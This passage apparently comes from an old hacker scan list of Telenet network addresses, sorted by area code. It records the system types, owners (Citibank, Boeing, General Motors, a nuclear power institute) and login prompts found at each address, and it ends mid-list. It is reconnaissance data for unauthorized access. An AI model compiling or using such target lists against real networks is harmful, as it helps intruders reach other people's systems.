|||
|
309 PRIME
|
|||
|
312 PRIME
|
|||
|
* 330
|
|||
|
* 331
|
|||
|
* 332
|
|||
|
* 333
|
|||
|
* 334
|
|||
|
* 335
|
|||
|
336 VAX Congressional Quarterly
|
|||
|
337 VAX "
|
|||
|
$ 343 PRIME OT
|
|||
|
360 HP-3000
|
|||
|
361
|
|||
|
362
|
|||
|
* 364
|
|||
|
365 LEXIS/NEXIS
|
|||
|
366 "
|
|||
|
367 "
|
|||
|
* 371
|
|||
|
* 372
|
|||
|
* 373
|
|||
|
* 377
|
|||
|
$ 390 #Connect Requested
|
|||
|
$ 391 "
|
|||
|
* 403
|
|||
|
430 >
|
|||
|
* 433
|
|||
|
* 434
|
|||
|
439 Institute of Nuclear Power
|
|||
|
440 "
|
|||
|
441 "
|
|||
|
442 you are now connected
|
|||
|
444 Institute of Nuclear Power
|
|||
|
$ 455
|
|||
|
456
|
|||
|
457
|
|||
|
458
|
|||
|
$ 462
|
|||
|
$ 463
|
|||
|
465
|
|||
|
466
|
|||
|
467
|
|||
|
469
|
|||
|
470
|
|||
|
472
|
|||
|
$ 473
|
|||
|
$ 474
|
|||
|
$ 475
|
|||
|
$ 532 VAX
|
|||
|
$ 535 AOS
|
|||
|
* 536
|
|||
|
* 652
|
|||
|
* 653
|
|||
|
* 654
|
|||
|
693 HP-3000 MPE XL
|
|||
|
709
|
|||
|
710
|
|||
|
711
|
|||
|
712
|
|||
|
810 Telenet Async to 3270
|
|||
|
811a Telenet Async to 3270
|
|||
|
1180 INVALID-SW-CHARACTERS
|
|||
|
1181
|
|||
|
1182 NCR Comten
|
|||
|
|
|||
|
|
|||
|
|
|||
|
203--CONNECTICUT--ADDRESSES SCANNED: 0-600
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
22 VM/370
|
|||
|
* 57
|
|||
|
$ 60 HP-3000
|
|||
|
66 Login Please:
|
|||
|
72 HP-3000
|
|||
|
73a Password:
|
|||
|
75 VAX
|
|||
|
$ 105 PC Pursuit Dialer (2400)
|
|||
|
$ 120 PC Pursuit Dialer (300)
|
|||
|
$ 121 PC Pursuit Dialer (1200)
|
|||
|
$ 132 VAX
|
|||
|
* 135
|
|||
|
136 PRIME SYSA
|
|||
|
$ 140 ID
|
|||
|
165 Telekurs USA
|
|||
|
* 230
|
|||
|
* 231
|
|||
|
304 HP-3000
|
|||
|
$ 305 Name?
|
|||
|
307 HP-3000
|
|||
|
310
|
|||
|
* 311
|
|||
|
* 331
|
|||
|
* 332
|
|||
|
* 501
|
|||
|
602 DESTINATION?
|
|||
|
|
|||
|
|
|||
|
205--ALABAMA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 30
|
|||
|
$ 33 ID
|
|||
|
* 34
|
|||
|
* 36
|
|||
|
$ 73 PRIME ALABMA
|
|||
|
* 137
|
|||
|
$ 145 HP-3000
|
|||
|
|
|||
|
|
|||
|
206--WASHINGTON--ADDRESSES SCANNED: 0-1000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 HP-3000
|
|||
|
$ 30 HP-3000
|
|||
|
32 VAX
|
|||
|
$ 35 DMOLNCT
|
|||
|
$ 38 AOS
|
|||
|
$ 40 PRIME P6350
|
|||
|
$ 42 AOS
|
|||
|
$ 44 AOS
|
|||
|
$ 50 AOS
|
|||
|
53
|
|||
|
$ 57 AOS
|
|||
|
65 PRIME OAD
|
|||
|
$ 131 AOS
|
|||
|
$ 132 VAX ETA-RX
|
|||
|
$ 135 AOS
|
|||
|
137a Boeing msg switch
|
|||
|
$ 138 USSMSG2
|
|||
|
$ 139 WANG VS SECURITIES (FRS)
|
|||
|
$ 141 AOS
|
|||
|
$ 145 AOS
|
|||
|
$ 146 PRIME SEATLE
|
|||
|
$ 147 AOS
|
|||
|
* 150
|
|||
|
$ 160 AOS
|
|||
|
$ 161 AOS
|
|||
|
175a Boeing test
|
|||
|
$ 205 PC Pursuit Dialer (300)
|
|||
|
$ 206 PC Pursuit Dialer (1200)
|
|||
|
207a
|
|||
|
$ 208 PC Pursuit Dialer (2400)
|
|||
|
$ 250 WANG VS SYSTEM ONE (FRC)
|
|||
|
$ 251 WANG VS SYSTEM TWO (TACOMA)
|
|||
|
$ 338
|
|||
|
$ 357 HP-3000
|
|||
|
$ 430 Environmental Ctrl Monitor
|
|||
|
439 bcs network
|
|||
|
440 NOS Boeing
|
|||
|
447 NOS Boeing
|
|||
|
448 bcs network
|
|||
|
449 VM/370
|
|||
|
|
|||
|
|
|||
|
207--MAINE--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 51
|
|||
|
|
|||
|
|
|||
|
208--IDAHO--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 42 AOS
|
|||
|
$ 43 AOS
|
|||
|
$ 56 AOS
|
|||
|
$ 131 AOS
|
|||
|
$ 134 AOS
|
|||
|
$ 135 AOS
|
|||
|
$ 136 AOS
|
|||
|
$ 137 AOS
|
|||
|
$ 140 AOS
|
|||
|
$ 141 AOS
|
|||
|
* 150
|
|||
|
$ 152 AOS
|
|||
|
|
|||
|
|
|||
|
209--CALIFORNIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 AOS
|
|||
|
* 33
|
|||
|
* 34
|
|||
|
|
|||
|
|
|||
|
211--DUN & BRADSTREET--ADDRESSES SCANNED: 0-100/1000-2000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
1140
|
|||
|
1142
|
|||
|
1145 Dun & Bradstreet Terminal
|
|||
|
1190 " "
|
|||
|
1195 " "
|
|||
|
1240 " "
|
|||
|
1244 " "
|
|||
|
1290 " "
|
|||
|
1291 " "
|
|||
|
1295 " "
|
|||
|
1390 " "
|
|||
|
1391 " "
|
|||
|
1392 PRIME
|
|||
|
1396 Dun & Bradstreet Terminal
|
|||
|
1490 PRIME
|
|||
|
1491 Dun & Bradstreet Terminal
|
|||
|
1492 " "
|
|||
|
1493 " "
|
|||
|
1494 " "
|
|||
|
1540 " "
|
|||
|
1591 " "
|
|||
|
1594 " "
|
|||
|
1594 " "
|
|||
|
1640 " "
|
|||
|
1690 " "
|
|||
|
1693 " "
|
|||
|
2140 CCS Online
|
|||
|
2141 CCS Online
|
|||
|
2142 VM/370
|
|||
|
2143 sls1
|
|||
|
2145 VM/370
|
|||
|
2150 PRIME
|
|||
|
2151 fsd2
|
|||
|
2152 socy
|
|||
|
2153 css3
|
|||
|
2154 CCS Online
|
|||
|
2155 CCS Online
|
|||
|
2156 ecl1
|
|||
|
2157 tbs1
|
|||
|
2158 dbc1
|
|||
|
2159 exx2
|
|||
|
2160 nyt2
|
|||
|
2162 css1
|
|||
|
2163 css2
|
|||
|
2164 bofa
|
|||
|
2165 soc1
|
|||
|
2166 soc2
|
|||
|
2167 socx
|
|||
|
2168 soc3
|
|||
|
2169 soca
|
|||
|
2170 socb
|
|||
|
2171 socc
|
|||
|
2172 dnb1
|
|||
|
2173 mdy2
|
|||
|
2174 koln
|
|||
|
2175 fsd1
|
|||
|
2176 ptts
|
|||
|
2177 has1
|
|||
|
2178 has3
|
|||
|
2179 levi
|
|||
|
2180 nyt1
|
|||
|
2181 pers
|
|||
|
2182 risk
|
|||
|
2183 usc1
|
|||
|
2184 cids
|
|||
|
2185 zyt1
|
|||
|
2186 inel
|
|||
|
2187 fop1
|
|||
|
2188 kbm1
|
|||
|
2189 kbm2
|
|||
|
2190 kbm3
|
|||
|
2191 kbm4
|
|||
|
2192 sls1
|
|||
|
2193 mdy1
|
|||
|
2194 ira1
|
|||
|
2195 ira2
|
|||
|
2196 why1
|
|||
|
2197 ndg1
|
|||
|
2198 lit1
|
|||
|
2450 PRIME
|
|||
|
3141 IDC/370
|
|||
|
6140 OAG
|
|||
|
|
|||
|
|
|||
|
212--NYC-BRONX & MANHATTAN--ADDRESSES SCANNED: 0-1200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 11 PLEASE BEGIN
|
|||
|
$ 28 PC Pursuit Dialer (2400)
|
|||
|
31 VM/370
|
|||
|
* 34
|
|||
|
39 PRIME IDDD
|
|||
|
40 PLEASE ENTER /LOGIN
|
|||
|
* 48
|
|||
|
$ 52 PRIME SYSA
|
|||
|
$ 73 USS00
|
|||
|
74 VM/370
|
|||
|
79 ENTER ID:
|
|||
|
* 85
|
|||
|
* 86
|
|||
|
$ 99 HP-3000
|
|||
|
105 ****INVALID SIGNON
|
|||
|
106 "
|
|||
|
108 "
|
|||
|
109 "
|
|||
|
110 "
|
|||
|
112 VM/370
|
|||
|
$ 124 VAX
|
|||
|
131 VM/370
|
|||
|
* 132
|
|||
|
* 135
|
|||
|
137 PRIME NY60
|
|||
|
141 PRIME Telemail
|
|||
|
142 PRIME "
|
|||
|
145 ENTER ACCESS ID:
|
|||
|
146 "
|
|||
|
* 149
|
|||
|
152 VAX
|
|||
|
$ 154 PRIME NYORK
|
|||
|
* 157
|
|||
|
* 158
|
|||
|
* 160
|
|||
|
$ 167 PRIME MPISBS
|
|||
|
170 Information Services Net
|
|||
|
172 "
|
|||
|
$ 173 Brown Brothers
|
|||
|
174 Information Services Net
|
|||
|
* 197
|
|||
|
200 ENTER IDENTIFICATION:
|
|||
|
216 Bank of New York
|
|||
|
226 USER ID
|
|||
|
231 VM/370
|
|||
|
$ 235 PRIME JAMACA
|
|||
|
237 TIMEINC NYK
|
|||
|
238
|
|||
|
246 VAX UniTraC
|
|||
|
248 PRIME RYE
|
|||
|
* 249
|
|||
|
* 255
|
|||
|
* 256
|
|||
|
$ 257 BANAMEX Data Network
|
|||
|
258 ENTER ACCESS ID:
|
|||
|
$ 259 VAX BTNET
|
|||
|
260 Bankers Trust Online
|
|||
|
263 VAX
|
|||
|
266 UNIX
|
|||
|
267 UNIX
|
|||
|
$ 271 :
|
|||
|
* 273
|
|||
|
$ 274 INVALID INPUT
|
|||
|
275 Bankers Trust Online
|
|||
|
* 278
|
|||
|
* 279
|
|||
|
* 306
|
|||
|
$ 315 PC Pursuit Dialer (1200)
|
|||
|
320 ENTER IDENTIFICATION
|
|||
|
321 "
|
|||
|
$ 322 COMMAND UNRECOGNIZED
|
|||
|
* 326
|
|||
|
328 ENTER IDENTIFICATION
|
|||
|
* 336
|
|||
|
345 PRIME NMSG
|
|||
|
$ 350 VTAM002
|
|||
|
$ 351 "
|
|||
|
* 352
|
|||
|
* 354
|
|||
|
359
|
|||
|
376 Bankers Trust Online
|
|||
|
377 "
|
|||
|
378 "
|
|||
|
379 "
|
|||
|
* 432
|
|||
|
433 VAX
|
|||
|
443 VAX
|
|||
|
444 PRIME EMCO
|
|||
|
$ 446 VAX
|
|||
|
449 VM/370
|
|||
|
446
|
|||
|
468
|
|||
|
479 Invalid Login Attempt
|
|||
|
* 496
|
|||
|
* 497
|
|||
|
500 enter a for astra
|
|||
|
501 "
|
|||
|
502 "
|
|||
|
503 "
|
|||
|
504 "
|
|||
|
505 "
|
|||
|
506 "
|
|||
|
507 "
|
|||
|
535 TIMEINC NYK
|
|||
|
536 "
|
|||
|
537 "
|
|||
|
539 VOS
|
|||
|
$ 540 VAX Client Videotext Server
|
|||
|
$ 541 VAX "
|
|||
|
544 TIMEINC NYK
|
|||
|
545 "
|
|||
|
$ 546 APLICACO:
|
|||
|
$ 548 PRIME TREPP1
|
|||
|
552 TIMEINC NYK
|
|||
|
553 "
|
|||
|
554 "
|
|||
|
566 "
|
|||
|
567 "
|
|||
|
* 576
|
|||
|
577 Telenet Async to 3270
|
|||
|
579a Telenet Async to 3270
|
|||
|
580
|
|||
|
615 Shearson Lehman Hutton
|
|||
|
631
|
|||
|
649 WANG VS
|
|||
|
693
|
|||
|
702
|
|||
|
713 PRIME NY60
|
|||
|
$ 726 VAX
|
|||
|
$ 737 FINLAY FINE JEWELRY
|
|||
|
$ 752 "
|
|||
|
$ 753 "
|
|||
|
755 VM/370
|
|||
|
* 768
|
|||
|
935
|
|||
|
* 970
|
|||
|
* 971
|
|||
|
* 972
|
|||
|
* 973
|
|||
|
* 974
|
|||
|
* 975
|
|||
|
* 976
|
|||
|
* 977
|
|||
|
* 978
|
|||
|
* 979
|
|||
|
981 UNIX
|
|||
|
* 1009
|
|||
|
* 1031
|
|||
|
1034
|
|||
|
1036
|
|||
|
1039
|
|||
|
* 1040
|
|||
|
$ 1045 HP-3000
|
|||
|
1049 MHP201A
|
|||
|
1052 PRIME FTC0
|
|||
|
1069 VAX
|
|||
|
$ 1071 GS/1
|
|||
|
$ 1072 GS/1
|
|||
|
* 1074
|
|||
|
* 1075
|
|||
|
|
|||
|
|
|||
|
213--CALIFORNIA--ADDRESSES SCANNED: 0-1200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
21 PRIME C6
|
|||
|
22 PRIME D6
|
|||
|
* 23
|
|||
|
24 Marketron Research
|
|||
|
25
|
|||
|
33
|
|||
|
35 Marketron Research
|
|||
|
40 PRIME A6
|
|||
|
* 41
|
|||
|
44
|
|||
|
* 45
|
|||
|
51
|
|||
|
$ 52 PRIME AIS8
|
|||
|
* 54
|
|||
|
* 57
|
|||
|
58 PRIME ACSI
|
|||
|
79 UNIX Interactive Systems
|
|||
|
88 PRIME MSCOST
|
|||
|
$ 92a
|
|||
|
102 PRIME TRWE.A
|
|||
|
$ 103 PC Pursuit Dialer (1200)
|
|||
|
105 PRIME SWOP
|
|||
|
$ 113
|
|||
|
118 VAX
|
|||
|
121 PRIME SWWE1
|
|||
|
122 PRIME TRNGW2
|
|||
|
123 PRIME SWWA1
|
|||
|
124 PRIME CS.CAR
|
|||
|
125 PRIME SWLAR
|
|||
|
126 HP-3000
|
|||
|
128 PRIME CS.SD
|
|||
|
$ 143 HP-3000 ANA Trading Corporation
|
|||
|
* 144
|
|||
|
151 PRIME CSSWR1
|
|||
|
153 PRIME SWLA1
|
|||
|
154 PRIME SWWCR
|
|||
|
155 PRIME CS.LA
|
|||
|
$ 166 BW/IP International Inc.
|
|||
|
* 169
|
|||
|
172a
|
|||
|
$ 176 AOS
|
|||
|
* 178
|
|||
|
199 PRIME C6
|
|||
|
219
|
|||
|
220 Telenet Async to 3270
|
|||
|
221a Telenet Async to 3270
|
|||
|
227a
|
|||
|
* 249
|
|||
|
* 250
|
|||
|
* 252
|
|||
|
* 255
|
|||
|
* 256
|
|||
|
* 257
|
|||
|
260 Telenet Async to 3270
|
|||
|
261a Telenet Async to 3270
|
|||
|
* 336
|
|||
|
$ 338 HP-3000
|
|||
|
340 PRIME TRNGW
|
|||
|
342 PRIME SWLB1
|
|||
|
347
|
|||
|
* 361
|
|||
|
$ 369 PRIME LA
|
|||
|
* 371
|
|||
|
374 Telenet Async to 3270
|
|||
|
375a Telenet Async to 3270
|
|||
|
$ 412 PC Pursuit Dialer (1200)
|
|||
|
$ 413 PC Pursuit Dialer (2400)
|
|||
|
* 464
|
|||
|
485a
|
|||
|
488a
|
|||
|
* 1041
|
|||
|
* 1043
|
|||
|
1403 COMPUTAX
|
|||
|
1404 COMPUTAX
|
|||
|
|
|||
|
|
|||
|
214--TEXAS--ADDRESSES SCANNED: 0-1200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
17 Teleview
|
|||
|
20 US Sprint
|
|||
|
21 Teleview
|
|||
|
* 22
|
|||
|
42 DNA Online
|
|||
|
* 48
|
|||
|
* 53
|
|||
|
60 HP-3000
|
|||
|
$ 62 PRIME TRUSWL
|
|||
|
* 65
|
|||
|
71 PRIME UCCC
|
|||
|
76 CYBER PCC
|
|||
|
77 PRIME UCCC
|
|||
|
94a
|
|||
|
$ 117 PC Pursuit Dialer (300)
|
|||
|
$ 118 PC Pursuit Dialer (1200)
|
|||
|
120
|
|||
|
131 HP-3000
|
|||
|
152 HP-3000
|
|||
|
156 HP-3000
|
|||
|
* 157
|
|||
|
159a C@
|
|||
|
160a C@
|
|||
|
168 HP-3000
|
|||
|
169 HP-3000
|
|||
|
176a PRIME UCCC
|
|||
|
177 HL053-TRAN
|
|||
|
231
|
|||
|
233
|
|||
|
236a
|
|||
|
240 VAX HQAAFES
|
|||
|
242 TACL 1>
|
|||
|
* 250
|
|||
|
* 252
|
|||
|
* 253
|
|||
|
* 254
|
|||
|
* 255
|
|||
|
* 256
|
|||
|
* 257
|
|||
|
* 258
|
|||
|
* 259
|
|||
|
* 261
|
|||
|
* 262
|
|||
|
* 263
|
|||
|
* 264
|
|||
|
* 265
|
|||
|
* 266
|
|||
|
* 267
|
|||
|
* 268
|
|||
|
* 269
|
|||
|
* 270
|
|||
|
* 279
|
|||
|
341 PRIME BNW
|
|||
|
342 PRIME GCAD..
|
|||
|
* 373
|
|||
|
* 530
|
|||
|
* 531
|
|||
|
* 532
|
|||
|
* 533
|
|||
|
* 534
|
|||
|
* 535
|
|||
|
* 536
|
|||
|
* 537
|
|||
|
* 538
|
|||
|
* 539
|
|||
|
607 HP-3000
|
|||
|
|
|||
|
|
|||
|
215--PENNSYLVANIA--ADDRESSES SCANNED: 0-400
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 5 PC Pursuit Dialer (300)
|
|||
|
$ 22 PC Pursuit Dialer (2400)
|
|||
|
* 30
|
|||
|
$ 32 AOS
|
|||
|
$ 35 IMS AMERICA
|
|||
|
40 VU/TEXT
|
|||
|
$ 45 IMS AMERICA
|
|||
|
49 Telebase Systems
|
|||
|
* 50
|
|||
|
* 54
|
|||
|
* 60
|
|||
|
66 Newsnet
|
|||
|
74
|
|||
|
92a
|
|||
|
$ 112 PC Pursuit Dialer (1200)
|
|||
|
121 Towers Perrin Online
|
|||
|
* 132
|
|||
|
135 VU/TEXT
|
|||
|
136 DSS::15B1
|
|||
|
137
|
|||
|
140 VU/TEXT
|
|||
|
$ 148 Weston's Computer Center
|
|||
|
$ 156 Telenet Async to 3270
|
|||
|
$ 157a Telener Async to 3270
|
|||
|
$ 234
|
|||
|
235 HP-3000
|
|||
|
262 Data Mail
|
|||
|
264 ?
|
|||
|
265 "
|
|||
|
266 "
|
|||
|
267 "
|
|||
|
268 "
|
|||
|
269 PRIME
|
|||
|
* 350
|
|||
|
* 360
|
|||
|
$ 361 HP-3000
|
|||
|
|
|||
|
|
|||
|
216--OHIO--ADDRESSES SCANNED: 0-400
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
$ 30 MRI CICS H0C3
|
|||
|
* 31
|
|||
|
$ 32 MRI CICS H0C3
|
|||
|
$ 34 PRIME SH.US
|
|||
|
$ 35
|
|||
|
* 51
|
|||
|
* 55
|
|||
|
* 57
|
|||
|
* 59
|
|||
|
$ 60 MHP201A
|
|||
|
66 Newsnet
|
|||
|
$ 74 HP-3000
|
|||
|
109a
|
|||
|
* 115
|
|||
|
$ 120 PC Pursuit Dialer (2400)
|
|||
|
* 125
|
|||
|
* 134
|
|||
|
* 135
|
|||
|
* 138
|
|||
|
$ 144 U#=
|
|||
|
163
|
|||
|
* 178
|
|||
|
|
|||
|
|
|||
|
217--ILLINIOS--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
25 UNIX University of Illinois
|
|||
|
26 UNIX University of Illinois
|
|||
|
$ 35 VAX NCSA VMSA
|
|||
|
$ 39 ID
|
|||
|
$ 40
|
|||
|
$ 41 PRIME SPRFLD
|
|||
|
|
|||
|
|
|||
|
218--MINNESOTA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 38 AOS
|
|||
|
$ 39 AOS
|
|||
|
* 40
|
|||
|
$ 42 AOS
|
|||
|
$ 45 AOS
|
|||
|
$ 56 AOS
|
|||
|
$ 142 AOS
|
|||
|
$ 157 AOS
|
|||
|
|
|||
|
|
|||
|
219--INDIANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
4 PRIME NODE.1
|
|||
|
5 PRIME NODE.2
|
|||
|
6 PRIME NODE.4
|
|||
|
7 PRIME NODE.5
|
|||
|
8 PRIME NODE.8
|
|||
|
9 N1127p3 ENTER GROUP NAME>
|
|||
|
10 Lincoln National Corp.
|
|||
|
* 50
|
|||
|
|
|||
|
|
|||
|
222--UNKNOWN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
100 PRIME
|
|||
|
301a C@
|
|||
|
401a C@
|
|||
|
|
|||
|
|
|||
|
223--CITIBANK--ADDRESSES SCANNED: 0-300/1000-3000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 1
|
|||
|
$ 2 VAX CRIS
|
|||
|
10 PRIME
|
|||
|
* 15
|
|||
|
19 HP-3000
|
|||
|
26 GS/1 IBISM Electronic Village
|
|||
|
30 VAX Citi Treasury Products
|
|||
|
31 INVALID FORMAT
|
|||
|
32 enter a for astra
|
|||
|
* 34
|
|||
|
35 VAX Citi Treasury Products
|
|||
|
39 HRINFO NETWORK
|
|||
|
40 VAX Global Report
|
|||
|
46 CICS PPD Communications Network
|
|||
|
47 CICS PPD Connunications Network
|
|||
|
48 Citibank NY port CBN2
|
|||
|
49 Online Manual
|
|||
|
50 PRIME
|
|||
|
55 PRIME WINMIS
|
|||
|
61 VAX Global Report
|
|||
|
63 VAX Global Report
|
|||
|
65 System/88
|
|||
|
$ 68 Citimail II
|
|||
|
70 VAX FIG ADMIN CLUSTER
|
|||
|
71 Enter Translator Number
|
|||
|
91 VAX
|
|||
|
$ 92 Citinet
|
|||
|
$ 94
|
|||
|
$ 95 <<ENTER PASSWORD>>
|
|||
|
$ 96 <<ENTER PASSWORD>>
|
|||
|
97 Quotdial
|
|||
|
98 VAX CMA1
|
|||
|
$ 100 VAX
|
|||
|
$ 103 <<ENTER PASSWORD>>
|
|||
|
$ 104 VAX
|
|||
|
175 enter a for astra
|
|||
|
$ 176 VAX PBGNY
|
|||
|
178 VAX Citibank VAXC
|
|||
|
179 VAX Citibank VAXC
|
|||
|
$ 180 Decserver
|
|||
|
$ 181 Decserver
|
|||
|
$ 182 Decserver
|
|||
|
* 183
|
|||
|
* 184
|
|||
|
* 185
|
|||
|
* 186
|
|||
|
$ 187 Decserver
|
|||
|
$ 189 Decserver
|
|||
|
193 PRIME
|
|||
|
$ 199 RSX-11
|
|||
|
201 C/C/M
|
|||
|
202 C/C/M
|
|||
|
203 C/C/M
|
|||
|
204 C/C/M
|
|||
|
208 C/C/M
|
|||
|
260 VAX
|
|||
|
* 1000
|
|||
|
|
|||
|
|
|||
|
224--CITIBANK--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
2 VAX Global Report
|
|||
|
5
|
|||
|
7 Citibank Test
|
|||
|
9 VAX
|
|||
|
13
|
|||
|
16 PLEASE SIGN ON
|
|||
|
17 Citibanking Hong Kong
|
|||
|
22
|
|||
|
24 Decserver
|
|||
|
26 Mexico Babymail
|
|||
|
27 Decserver
|
|||
|
28 Decserver
|
|||
|
36 Citibank Mexico
|
|||
|
47 PPD Communications Network
|
|||
|
51 "
|
|||
|
52 Citibank Mexico
|
|||
|
57 VAX
|
|||
|
58 Citibank Venesuela
|
|||
|
59 Citibank Quito
|
|||
|
60 Citibank CBK3
|
|||
|
61 Citibank Sidney
|
|||
|
62 Citibank Jakarta
|
|||
|
63 Citibank Manila
|
|||
|
64 Citibank New Zealand
|
|||
|
65 Citibank Singapore
|
|||
|
66
|
|||
|
67
|
|||
|
68 Argentina Mail
|
|||
|
71 ENTER TRANSACTION ID:
|
|||
|
73 Decserver
|
|||
|
74 CHANNEL 03/104
|
|||
|
76 Cititrak BBS
|
|||
|
78 Citibank Hong Kong
|
|||
|
79 Citibank New York
|
|||
|
81 Citibank Tokyo
|
|||
|
82 Citibank Seoul
|
|||
|
83 Citibank New York
|
|||
|
84 World Corp. Group
|
|||
|
85 Citibank Hong kong
|
|||
|
86 Citibank Singapore
|
|||
|
87 Decserver
|
|||
|
88 Citibank Taipei
|
|||
|
89 Citibank ICC
|
|||
|
90 WANG VS BANCO INTERNAL
|
|||
|
91 PRIME
|
|||
|
92
|
|||
|
93
|
|||
|
94 IBM 3270 CSGCOPRO
|
|||
|
97 CitiMail-Asia Pacific
|
|||
|
98 C/C/M
|
|||
|
100 CitiSwitch, New York
|
|||
|
101 BMS==>
|
|||
|
102 CitiSwitch Hong Kong
|
|||
|
103 BRAZILMAIL
|
|||
|
104 BMS==>
|
|||
|
105 Type .
|
|||
|
106 Citibank Panama
|
|||
|
107
|
|||
|
108 C/C/M
|
|||
|
109 Citibank Baharain
|
|||
|
110 Citibank Puerto Rico
|
|||
|
111
|
|||
|
113 Citibank London
|
|||
|
114
|
|||
|
115
|
|||
|
117 Citibank Hong Kong
|
|||
|
118 NEWNET BS
|
|||
|
119 Decserver
|
|||
|
121 NEWNET BS
|
|||
|
122 VAX Global Report
|
|||
|
125 ENTER TRANSACTION ID:
|
|||
|
127 Citibank Jakarta
|
|||
|
128 PRIME
|
|||
|
129 VAX CitiTreasury Products
|
|||
|
130 VAX "
|
|||
|
131 Citibank New York
|
|||
|
134
|
|||
|
137 HP-3000
|
|||
|
138
|
|||
|
139 VAX I.B.F.S.
|
|||
|
140 "
|
|||
|
141 HP-3000
|
|||
|
145 PRIME
|
|||
|
150 Citibank New Jersey
|
|||
|
151
|
|||
|
154 PRIME
|
|||
|
160
|
|||
|
161 VAX FIG ADMIN
|
|||
|
162 PRIME
|
|||
|
163 PRIME
|
|||
|
164 PRIME WINMIS
|
|||
|
165 GS/1 IBISM Elctronic Village
|
|||
|
166 VAX CitiTreasury Products
|
|||
|
167 VAX "
|
|||
|
168 VAX Global Report
|
|||
|
170 Electronic Cash Manager
|
|||
|
173 HELP Online User Manager
|
|||
|
174 PRIME
|
|||
|
175 enter a for astra
|
|||
|
176 Decserver
|
|||
|
177
|
|||
|
178 VAX CRIS
|
|||
|
179 Citinet
|
|||
|
180 ENTER QUOTDIAL ID:
|
|||
|
181 Citimail II N. America
|
|||
|
183 PRIME
|
|||
|
187 Decserver
|
|||
|
188 GS/1 Cititrust WIN
|
|||
|
190 HP-3000
|
|||
|
191 ENTER TYPE NUMBER
|
|||
|
192 HP-3000
|
|||
|
193 HP-3000
|
|||
|
196 VAX CMA1
|
|||
|
197 HRINFO NETWORK
|
|||
|
199 CHANNEL 08/017
|
|||
|
200 Citibank Baharain
|
|||
|
201 CitiMail-Asia Pacific
|
|||
|
202 "
|
|||
|
203 Citibank Hong Kong
|
|||
|
204 LAGB LATINMAIL
|
|||
|
205
|
|||
|
207 CitiBanking SUC.MONTEVIDEO
|
|||
|
213
|
|||
|
217
|
|||
|
219 Citibank Stockholm
|
|||
|
221
|
|||
|
222 XENIX
|
|||
|
223 VAX Global Report
|
|||
|
224 PRIME
|
|||
|
229 VAX Global Report
|
|||
|
231
|
|||
|
501 PRIME ATG
|
|||
|
506 IBM Citibank Hong Kong
|
|||
|
|
|||
|
|
|||
|
229--GENERAL MOTORS--ADDRESSES SCANNED: 0-500
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
113 DCIPC
|
|||
|
114 %@CTVVAUd@dUYECVGUIied
|
|||
|
118 " "
|
|||
|
137 VAX
|
|||
|
152 VAX
|
|||
|
171 (Channel b.h128.001)
|
|||
|
172 " "
|
|||
|
176 NOS
|
|||
|
177 (Channel b.h101.001)
|
|||
|
178 (Channel b.h128.001)
|
|||
|
179 " "
|
|||
|
181 USER NUMBER--
|
|||
|
183 USER NUMBER--
|
|||
|
184 Division:
|
|||
|
185
|
|||
|
187 DEC20
|
|||
|
219 VM/370
|
|||
|
220
|
|||
|
226 VAX
|
|||
|
310 PRIME
|
|||
|
311 IUeASID@CVTTAUD@bhUcAg
|
|||
|
|
|||
|
|
|||
|
301--NARYLAND--ADDRESSES SCANNED: 0-500
|
|||
|
|
